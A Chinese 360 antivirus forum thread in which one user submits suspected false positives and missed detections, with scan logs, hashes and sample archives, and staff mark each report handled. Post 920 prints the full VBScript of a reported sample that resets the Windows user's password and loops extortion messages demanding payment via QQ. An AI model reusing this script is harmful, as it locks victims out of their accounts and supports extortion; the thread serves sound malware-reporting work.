请使用手机微信扫码安全登录

切换账号密码登录

绑定手机号

应国家法规对于账号实名的要求,请您在进行下一步操作前,需要先完成手机绑定 (若绑定失败,请重新登录绑定)。了解更多

不绑定绑定手机号

360官网 | 360商城

推荐论坛版块活动360粉丝商城众测粉丝轰趴馆常见问题
844
沧桑浪子 VIP认证 LV11.大校 发表于 2018-4-17 10:32 | 显示全部楼层 | 私信
本帖最后由 沧桑浪子 于 2018-4-17 11:47 编辑
前几天是双击报毒,右键扫描好像不报
wmplayer.exe
现在扫描和双击都报
给看看是不是误报
别人电脑上的,我刚拷贝的
Windows Media Player.zip (1.93 MB)
wmplayer.zip (35.82 KB)

类型:木马-HEUR/Malware.QVM02.Gen
描述:木马是一种伪装成正常文件的恶意软件,会盗取您的帐号、密码等隐私资料。
扫描引擎:云安全引擎
文件路径:C:\Documents and Settings\Administrator\桌面\Windows Media Player\wmplayer.exe
文件大小:72K (73,728 字节)
文件版本:10.00.00.3802
文件描述:Windows Media Player
文件指纹(MD5):330154bc91fa8e057396aef34c14f2cd
处理建议:隔离文件


沧桑浪子 LV11.大校 回复师兄_:那么该不该报毒呢? 
2018-4-17 17:28回复
师兄_ LV7.上尉 已处理,文件是修复过的被感染文件 
2018-4-17 16:38回复
846
沧桑浪子 VIP认证 LV11.大校 发表于 2018-4-25 23:26 | 显示全部楼层 | 私信
https://pan.baidu.com/s/1qUU3k4hAkPFyKUehQEvQPw
帮群用户反馈一下误报,压缩包密码是 360qvm
来自360手机 N5(360社区3.4.2版)
师兄_ LV7.上尉 已处理 
2018-4-26 11:31回复
848
沧桑浪子 VIP认证 LV11.大校 发表于 2018-4-26 22:49 | 显示全部楼层 | 私信
https://pan.baidu.com/s/1TSHO8WkLQVUgTutc5Y-uQQ
这是旧版小工具的下载链接,解压密码还是 360qvm
来自360手机 N5(360社区3.4.2版)
师兄_ LV7.上尉 已处理 
2018-4-27 10:30回复
856
沧桑浪子 VIP认证 LV11.大校 发表于 2018-5-2 11:33 | 显示全部楼层 | 私信
本帖最后由 沧桑浪子 于 2018-5-2 11:40 编辑
通用的一键优化.zip (57.09 KB)

是误报吗?
本来人家是小红伞引擎误报,现在又多了个云QVM
http://bbs.360.cn/thread-15417304-1-1.html


还有一个本来是云拉黑报毒法
现在也是云QVM
http://bbs.360.cn/thread-15417198-1-1.html
QuickMute.zip (42.3 KB)


沧桑浪子 LV11.大校 回复师兄_:QuickMute.zip (42.3 KB) 变成了云QVM后面是F235 
2018-5-5 11:36回复
师兄_ LV7.上尉 均处理啦~ 
2018-5-3 11:39回复
857
沧桑浪子 VIP认证 LV11.大校 发表于 2018-5-3 13:53 | 显示全部楼层 | 私信
本帖最后由 沧桑浪子 于 2018-5-3 13:55 编辑
类型:
HEUR/QVM11.1.E8DF.Malware.Gen

描述:
HEUR/QVM11.1.E8DF.Malware.Gen

扫描引擎:
360云查杀引擎

文件路径:
D:\360安全浏览器下载\QuickMute\nircmd.exe

文件指纹(MD5):
84d499f558570c32f4cb100a9124890b

类型:
HEUR/QVM11.1.E8DF.Malware.Gen

描述:
HEUR/QVM11.1.E8DF.Malware.Gen

扫描引擎:
360云查杀引擎

文件路径:
D:\360安全浏览器下载\QuickMute.zip

文件指纹(MD5):
84d499f558570c32f4cb100a9124890b

这个不是误报? nircmd.zip (41.08 KB)
如果真不是,那就不是吧,反正不是我的文件
--------------------------------------------
编辑

还有这个,扫描的时候没报啊,除了小红伞引擎
下载防护的话就是云QVM了,还没有生效吗?



858
沧桑浪子 VIP认证 LV11.大校 发表于 2018-5-4 20:53 | 显示全部楼层 | 私信
0.rar (376.04 KB)
解压密码是 infected
漏报
师兄_ LV7.上尉 已处理 
2018-5-7 10:29回复
860
沧桑浪子 VIP认证 LV11.大校 发表于 2018-5-9 17:09 | 显示全部楼层 | 私信
QVM报毒.zip (5.33 MB)
这两天一直在反馈一个特殊BUG,文件普通压缩后,再采用.exe自解压压缩,被上传到云端后(自动上传或者手动360闪电云鉴定器上传)会报感染型病毒(Win32/Trojan.fba),但是偶尔也会有QVM的报毒,这次这个就是


360杀毒扫描日志

病毒库版本:2018-05-08 18:41
扫描时间:2018-05-09 17:10:32
扫描用时:00:00:04
扫描类型:右键扫描
扫描文件总数:9
项目总数:2
清除项目数:0

扫描选项
----------------------
扫描所有文件:是
扫描压缩包:是
发现病毒处理方式:由用户选择处理
扫描磁盘引导区:是
扫描 Rootkit:是
使用云查杀引擎:是
使用QVM人工智能引擎:是
扫描建议修复项:是
常规引擎设置:Avira(小红伞)

扫描内容
----------------------
D:\360安全浏览器下载\QVM报毒.zip


白名单设置
----------------------


扫描结果
======================
高危风险项
----------------------
D:\360安全浏览器下载\QVM报毒.zip=>QVM报毒/winrar.exe        HEUR/QVM10.1.0B7D.Malware.Gen        未处理
D:\360安全浏览器下载\QVM报毒.zip=>QVM报毒/用winrar测试.exe        HEUR/QVM10.1.0B7D.Malware.Gen        未处理


师兄_ LV7.上尉 已处理~ 
2018-5-10 14:53回复
861
沧桑浪子 VIP认证 LV11.大校 发表于 2018-5-11 14:06 | 显示全部楼层 | 私信
自解压本地QVM防护误报 时间校对1.71.sfx.zip (225.31 KB)
自解压方式压缩的一个正常无毒文件,本地QVM防护误报

360杀毒实时防护日志

时间                    防护说明                                                                  处理结果                                                        文件
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2018-05-11 13:56:34     恶意软件(QVM41.2.FC41.Malware.Gen)MD5:9a5b31f1177a9ee16a548e7257d029f0    已删除此文件,如果您发现误删,可从隔离区恢复此文件。        d:\360安全浏览器下载\时间校对1.71.sfx.exe
师兄_ LV7.上尉 已处理~ 
2018-5-16 16:59回复
863
沧桑浪子 VIP认证 LV11.大校 发表于 2018-5-11 16:44 | 显示全部楼层 | 私信
本帖最后由 沧桑浪子 于 2018-5-11 16:54 编辑
迅雷.exe和压缩后 迅雷.zip,打包一个文件夹,然后自解压文件,迅雷.exe
云QVM报毒
类似的BUG,前几天已经反馈给 李宜檑
云QVM 迅雷.zip (1.46 MB)

类型:木马-HEUR/QVM41.2.168B.Malware.Gen
描述:木马是一种伪装成正常文件的恶意软件,会盗取您的帐号、密码等隐私资料。
扫描引擎:云安全引擎
文件路径:C:\Documents and Settings\Administrator\桌面\新建文件夹\迅雷.exe
文件大小:1.69M (1,767,922 字节)
文件指纹(MD5):906ad2ec4558b462d6823cb59c7fb54c
处理建议:隔离文件

871
沧桑浪子 VIP认证 LV11.大校 发表于 2018-5-14 22:35 | 显示全部楼层 | 私信
只有360三个数字的.txt改成.exe.zip (201.36 KB)
本地QVM防护误报
2018-05-14 22:32:22     恶意软件(QVM41.2.23A5.Malware.Gen)MD5:a84c6784f215722f8495721c1a8284f8    已删除此文件,如果您发现误删,可从隔离区恢复此文件。        c:\documents and settings\administrator\桌面\只有360三个数字的.txt改成.exe.exe
沧桑浪子 LV11.大校 回复师兄_:白天双击测试发现还在报,而且是同样的报法 
2018-5-18 22:48回复
师兄_ LV7.上尉 已处理~ 
2018-5-16 17:19回复
872
沧桑浪子 VIP认证 LV11.大校 发表于 2018-5-16 18:10 | 显示全部楼层 | 私信
应该是黑客小工具
算不算是漏报
Install_tkz.zip (2.22 MB)

师兄_ LV7.上尉 已处理 
2018-5-24 10:17回复
2018-5-16 21:01回复
876
沧桑浪子 VIP认证 LV11.大校 发表于 2018-5-20 15:17 | 显示全部楼层 | 私信
本帖最后由 沧桑浪子 于 2018-5-20 15:21 编辑
是误报吗?、
网吧里的文件
lycbwsz9.rar (201.36 KB) mdgxe.rar (49.31 KB) shark.rar (201.35 KB)
类型:
HEUR/QVM19.1.48CC.Malware.Gen

描述:
HEUR/QVM19.1.48CC.Malware.Gen

扫描引擎:
360云查杀引擎

文件路径:
C:\Boot\ja-JP\c9WOCnClzn4A\shark.exe

文件指纹(MD5):
46cdca92dcd8b46c2237bd39680c11bf



877
沧桑浪子 VIP认证 LV11.大校 发表于 2018-5-20 15:40 | 显示全部楼层 | 私信
本帖最后由 沧桑浪子 于 2018-5-20 21:43 编辑
Em_1odiv.rar (15.62 KB)
什么鬼?

抢鲜版8111A

类型:
HEUR/QVM18.1.8E6F.Malware.Gen

描述:
恶意软件是对病毒、木马、蠕虫、后门程序等危害用户计算机及数据安全的有害软件的统称。危害较大。

扫描引擎:
小红伞本地引擎

文件路径:
C:\Windows\inf\USB3h\S4sUeSVgfpxe\Em_1odiv.exe

文件指纹(MD5):
099378a5c97e5f5457d8d2eaff755dcc

上面是网吧里测试的,win7
下面在家XP测试

类型:
TR.Muldrop.avuvg

描述:
恶意软件是对病毒、木马、蠕虫、后门程序等危害用户计算机及数据安全的有害软件的统称。危害较大。

扫描引擎:
小红伞本地引擎

文件路径:
C:\Documents and Settings\Administrator\桌面\forum_5b0126228279c_Em_1odiv.rar

文件指纹(MD5):
099378a5c97e5f5457d8d2eaff755dcc


又出现了

如果是误报的话,要不然等BUG修复后再解除,哈哈哈!5.0正式版和5.0抢鲜版都有这个BUG
http://bbs.360.cn/thread-15440324-1-1.html



878
沧桑浪子 VIP认证 LV11.大校 发表于 2018-5-20 23:39 | 显示全部楼层 | 私信
@XP+商丘+沧桑浪子 能不能帮忙反馈一些被QVM误报的样本?有几个之前已经解除误报,不知道为什么最近又被误报了
下载链接:https://pan.baidu.com/s/1pGRnNQXG5YU2_Dqr8jBqSw
解压密码:360
来自360手机 N5(360社区3.4.4版)
884
沧桑浪子 VIP认证 LV11.大校 发表于 2018-6-4 22:33 | 显示全部楼层 | 私信
价格表.zip (233.5 KB) 漏报
https://bbs.kafan.cn/thread-2124395-1-1.html
师兄_ LV7.上尉 回复沧桑浪子: 已查杀呢 ~ 
2018-6-6 09:33回复
沧桑浪子 LV11.大校 回复师兄_:不是木马吗? 
2018-6-5 19:57回复
师兄_ LV7.上尉 已处理 
2018-6-5 10:04回复
887
沧桑浪子 VIP认证 LV11.大校 发表于 2018-6-13 22:47 | 显示全部楼层 | 私信
System Destroyer.zip (878.57 KB) 360就杀了其中的一个文件,看看其它的有没有问题
貌似是修改MBR的木马

类型:
HEUR/QVM05.1.AEA3.Malware.Gen

描述:
HEUR/QVM05.1.AEA3.Malware.Gen

扫描引擎:
360云查杀引擎

文件路径:
C:\Documents and Settings\Administrator\桌面\新建文件夹\System Destroyer.zip

文件指纹(MD5):
38e93d542f643f117dd7e8dc7e59522b
师兄_ LV7.上尉 已处理 
2018-6-14 14:21回复
894
沧桑浪子 VIP认证 LV11.大校 发表于 2018-6-21 21:11 | 显示全部楼层 | 私信
Es4.Deploy.zip (4.93 MB)
是误报吗?

类型:木马-HEUR/QVM11.1.766B.Malware.Gen
描述:木马是一种伪装成正常文件的恶意软件,会盗取您的帐号、密码等隐私资料。
扫描引擎:云安全引擎
文件路径:C:\Windows\Es4.Deploy.exe
文件大小:4.95M (5,187,600 字节)
文件版本:16.0.18.528
文件描述:
文件指纹(MD5):cbd4842fc5b9d1ee5d747714c0912b46
处理建议:隔离文件

另外
878楼是误报吗?
师兄_ LV7.上尉 已处理 
2018-7-5 10:50回复
908
沧桑浪子 VIP认证 LV11.大校 发表于 2018-7-17 15:39 | 显示全部楼层 | 私信
Es4.Deploy.zip (4.93 MB)

是误报吗?
类型:
HEUR/QVM11.1.766B.Malware.Gen

描述:
HEUR/QVM11.1.766B.Malware.Gen

扫描引擎:
360云查杀引擎

文件路径:
H:\样本\Es4.Deploy.zip

文件指纹(MD5):
cbd4842fc5b9d1ee5d747714c0912b46

沧桑浪子 LV11.大校 回复师兄_:还是在报!是不是非误报?这个应该是系统封装的相关文件 
2018-7-26 14:51回复
师兄_ LV7.上尉 已处理 
2018-7-19 10:05回复
910
沧桑浪子 VIP认证 LV11.大校 发表于 2018-7-26 14:33 | 显示全部楼层 | 私信
误报
应该是电脑店U盘启动里PE的相关文件

intelraid.zip (1.31 MB) intelraid.zip (3.46 MB)

扫描结果
======================
高危风险项
----------------------
D:\360安全浏览器下载\DianNaoDian\Data\PE\10PE64.wim=>Windows\System32\drivers\IntelRaid.sys        HEUR/QVM18.1.5D06.Malware.Gen        未处理
D:\360安全浏览器下载\DianNaoDian\Data\PE\8PE32.wim=>Windows\System32\drivers\IntelRaid.sys        HEUR/QVM18.1.61AF.Malware.Gen        未处理
D:\360安全浏览器下载\DianNaoDian_v7.2.7z=>DianNaoDian\Data\PE\10PE64.wim=>Windows\System32\drivers\IntelRaid.sys        HEUR/QVM18.1.5D06.Malware.Gen        未处理
D:\360安全浏览器下载\DianNaoDian_v7.2.7z=>DianNaoDian\Data\PE\8PE32.wim=>Windows\System32\drivers\IntelRaid.sys        HEUR/QVM18.1.61AF.Malware.Gen        未处理
师兄_ LV7.上尉 已处理 
2018-7-27 10:51回复
911
沧桑浪子 VIP认证 LV11.大校 发表于 2018-7-26 14:50 | 显示全部楼层 | 私信
D:\360安全浏览器下载\QuickMute.zip=>QuickMute/nircmd.exe        HEUR/QVM11.1.C145.Malware.Gen        未处理
D:\360安全浏览器下载\QuickMute\nircmd.zip=>nircmd.exe        HEUR/QVM11.1.C145.Malware.Gen        未处理
nircmd.zip (41.08 KB)

是误报吗?
师兄_ LV7.上尉 已处理 
2018-7-27 10:58回复
919
沧桑浪子 VIP认证 LV11.大校 发表于 2018-8-10 17:10 | 显示全部楼层 | 私信
漏报或者误报
可疑的文件.zip (4.8 MB)

两个不报的,看看是不是漏报
一个报毒的,看看是不是误报



D:\360安全浏览器下载\False Positive\可疑的文件.zip=>kafanyangbenwubao.vir        HEUR/QVM19.1.C5B1.Malware.Gen        未处理

920
沧桑浪子 VIP认证 LV11.大校 发表于 2018-8-10 17:17 | 显示全部楼层 | 私信
可疑文件
我的世界外挂网站大全.rar (611 Bytes)

Const strPassword = "senge"'   
Dim WshNetwork
Set WshNetwork = CreateObject("WScript.Network")
Dim userName
userName = WshNetwork.userName&",user"
Dim Domain
Set Domain = GetObject("WinNT://./"&userName)
Domain.SetPassword strPassword
Domain.SetInfo
dim gj
on error resume next
dim WSHshellA
set WSHshellA = wscript.createobject("wscript.shell")
do
msgbox"你的电脑密码已被黑客修改,不信自己看看账户密码对不对,千万别关机和注销关机你电脑就废了最好赶紧速度转发5个群,转发完了联系Q:936402343 他会帮你解开准备好钱如果不想给钱的话加QQ和那个人商量商量"
msgbox"别想着直接加q 没有发5个群外加截图给他,他是不会理你的."
loop
师兄_ LV7.上尉 这个不是PE文件…… 
2018-8-14 11:31回复
972
沧桑浪子 VIP认证 LV11.大校 发表于 2018-10-12 14:39 | 显示全部楼层 | 私信
师兄_ LV7.上尉 已处理~ 
2018-10-12 15:41回复
981
沧桑浪子 VIP认证 LV11.大校 发表于 2018-10-21 15:28 | 显示全部楼层 | 私信
本帖最后由 沧桑浪子 于 2018-10-21 15:29 编辑
样本https://pan.baidu.com/s/1fZXwLGfs5kV0nt4YVE-jAQ
后门木马
https://bbs.kafan.cn/thread-2134754-1-1.html
师兄_ LV7.上尉 已处理 
2018-10-24 14:50回复
1010
沧桑浪子 VIP认证 LV11.大校 发表于 2018-12-7 13:09 | 显示全部楼层 | 私信
intelraid.zip (1.31 MB)

误报
2018-12-07 13:04:30     恶意软件(HEUR/QVM18.1.B2F3.Malware.Gen)MD5:28fc136d68bb67a5e3630d21fd164641已删除此文件,如果您发现误删,可从隔离区恢复此文件。        c:\documents and settings\administrator\桌面\新建文件夹\intelraid.sys
师兄_ LV7.上尉 已处理 
2018-12-12 16:36回复
1013
沧桑浪子 VIP认证 LV11.大校 发表于 2018-12-12 09:28 | 显示全部楼层 | 私信
文件误报
类型:木马-HEUR/QVM03.0.CDF5.Malware.Gen
描述:木马是一种伪装成正常文件的恶意软件,会盗取您的帐号、密码等隐私资料。
扫描引擎:云特征引擎
文件路径:C:\Documents and Settings\Administrator\桌面\VIRUSKILLER.exe
文件大小:180K (184,320 字节)
文件版本:2.0.0.0
文件描述:
文件指纹(MD5):5c988d4b5a478e0912eca5da1194265c
处理建议:隔离文件
VIRUSKILLER.zip (20.86 KB)
师兄_ LV7.上尉 已处理 
2018-12-12 16:38回复
1030
沧桑浪子 VIP认证 LV11.大校 发表于 2019-1-5 09:30 | 显示全部楼层 | 私信
【加急】公司刚上的新软件,隔离区发现云QVM误报,估计是360杀毒防御自动删除的!看看能加白吗?

2019-01-03 13:31:04     恶意软件(HEUR/QVM41.2.4AF1.Malware.Gen)MD5:855f285b4e069572c8c2ffa462342579已删除此文件,如果您发现误删,可从隔离区恢复此文件。        c:\documents and settings\administrator\application data\hhsjpt-air20190102144415\local store\hhsjpt_air.exe

hhsjpt_air.zip (7.35 MB)


沧桑浪子 LV11.大校 回复师兄_:希望师兄已处理~后面再加上,比如,已处理,确认误报,已加白,或者已取消拦截!已处理,确认病毒!已拉黑! 因为以前有过,已处理,但是发现样本还是在拦截的情况! 
2019-1-7 11:41回复
师兄_ LV7.上尉 已处理~ 
2019-1-7 11:19回复
1035
沧桑浪子 VIP认证 LV11.大校 发表于 2019-1-16 18:56 | 显示全部楼层 | 私信
radF09C1.zip (2.89 KB)
病毒举报
师兄_ LV7.上尉 感谢反馈,已处理 
2019-1-17 14:27回复
1037
沧桑浪子 VIP认证 LV11.大校 发表于 2019-1-17 18:19 | 显示全部楼层 | 私信
本帖最后由 沧桑浪子 于 2019-1-17 18:21 编辑


之前解决了的,无毒.exe文件,无毒.exe打包成压缩包,然后两者,即 无毒.exe文件+无毒.exe打包成的压缩包,放文件夹里,再次打包成.exe自解压文件!刚才防护又报毒了!
误报,请先解压.zip (2.67 MB)

360杀毒实时防护日志

时间                    防护说明                                                                  处理结果                                                        文件
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2019-01-17 18:15:00     恶意软件(HEUR/QVM10.1.9ACE.Malware.Gen)MD5:23095612f8b1862858ad240ddec9f058已删除此文件,如果您发现误删,可从隔离区恢复此文件。        c:\documents and settings\administrator\桌面\winrar.exe


师兄_ LV7.上尉 感谢反馈,已经处理啦 
2019-1-22 10:13回复
1040
沧桑浪子 VIP认证 LV11.大校 发表于 2019-1-19 20:44 | 显示全部楼层 | 私信
forum_5c0a00526883b_intelraid.zip (1.31 MB)

是误报吗?
类型:
HEUR/QVM18.1.A6A5.Malware.Gen

描述:
HEUR/QVM18.1.A6A5.Malware.Gen

扫描引擎:
360云查杀引擎

文件路径:
C:\Users\Administrator\Desktop\forum_5c0a00526883b_intelraid.zip

文件指纹(MD5):
28fc136d68bb67a5e3630d21fd164641
师兄_ LV7.上尉 已处理 
2019-1-22 10:16回复
您需要登录后才可以回帖 登录 | 注册

本版积分规则

360fans_uid19400513 产品答疑师

粉丝:75 关注:0 积分:19200

精华:0 金币:17010 经验:12631

最后登录时间:2022-08-19

私信 加好友

最新活动

【360AI浏览器&360AI搜索】公测开启

排行榜

热度排行 查看排行
今日 本周 本月 全部
    今日 本周 本月 全部

      内容推荐 热门推荐最新主帖

      扫码添加360客服号,涨知识的同时还有超多福利等你哦

      快速回复 返回顶部 返回列表